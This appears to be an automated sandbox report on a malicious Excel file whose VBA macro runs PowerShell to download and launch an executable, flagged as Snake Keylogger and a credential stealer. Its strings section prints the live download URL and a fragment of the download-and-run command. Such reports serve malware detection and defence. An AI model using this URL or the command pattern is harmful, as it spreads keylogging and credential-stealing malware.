              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443

              Networking

              barindex
              Yara detected Generic Downloader
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: global trafficHTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD0796D.pngJump to behavior
              Source: global trafficHTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: cia.tf
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
              Source: tmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: powershell.exe, 00000002.00000002.415420212.0000000003F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cia.tf
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: powershell.exe, 00000002.00000002.425832716.000000001C18C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: powershell.exe, 00000002.00000002.415420212.00000000037E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0?
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0_
              Source: powershell.exe, 00000002.00000002.415420212.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: powershell.exe, 00000002.00000002.415420212.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf
              Source: vbaProject.binString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
              Source: powershell.exe, 00000002.00000002.425256294.000000001AB15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415390039.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425588760.000000001AF66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415315754.0000000000204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
              Source: powershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;z
              Source: powershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exed
              Source: vbaProject.binString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
              Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: powershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: tmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: https://www.ssl.com/repository0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Document contains an embedded VBA macro with suspicious strings
              Source: 7qsPAygCOx.xlsxOLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: BA230000.0.drOLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Document contains an embedded VBA with hexadecimal encoded strings
              Source: 7qsPAygCOx.xlsxStream path 'VBA/ThisWorkbook' : found hex strings
              Source: BA230000.0.drStream path 'VBA/ThisWorkbook' : found hex strings
              Drops large PE files
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeFile dump: svcost.exe.5.dr 293066043Jump to dropped file
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7752.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00208A105_2_00208A10
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0020CAD85_2_0020CAD8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00208A005_2_00208A00
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00613BD05_2_00613BD0
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0064F0E85_2_0064F0E8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_006408A85_2_006408A8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_006482505_2_00648250
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00640C565_2_00640C56
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A900405_2_00A90040
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A9C8585_2_00A9C858
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A919A35_2_00A919A3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A9D5005_2_00A9D500
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A9C0885_2_00A9C088
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A940F85_2_00A940F8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A900065_2_00A90006
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A968585_2_00A96858
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A941085_2_00A94108
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00A957C85_2_00A957C8
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00AACC205_2_00AACC20
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00AA74705_2_00AA7470
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00AAED305_2_00AAED30
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2C0105_2_00D2C010
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D28D485_2_00D28D48
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2C6A95_2_00D2C6A9
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D278E05_2_00D278E0
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D200405_2_00D20040
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2D2285_2_00D2D228
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2C3475_2_00D2C347
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D28D405_2_00D28D40
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_04A700405_2_04A70040
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_050200065_2_05020006
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_050200405_2_05020040
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0503E3505_2_0503E350
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0503DEF85_2_0503DEF8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_002F8A108_2_002F8A10
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_002FCAD88_2_002FCAD8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_002F8A008_2_002F8A00
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_002FDE088_2_002FDE08
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0069D9808_2_0069D980
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_006908A88_2_006908A8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_006908988_2_00690898
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0069D9708_2_0069D970
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00690C568_2_00690C56
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0211C8588_2_0211C858
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021100408_2_02110040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021119A38_2_021119A3
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0211D5008_2_0211D500
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021100078_2_02110007
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021168588_2_02116858
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0211C0888_2_0211C088
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021140F88_2_021140F8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021141088_2_02114108
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_021157C88_2_021157C8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0212CC208_2_0212CC20
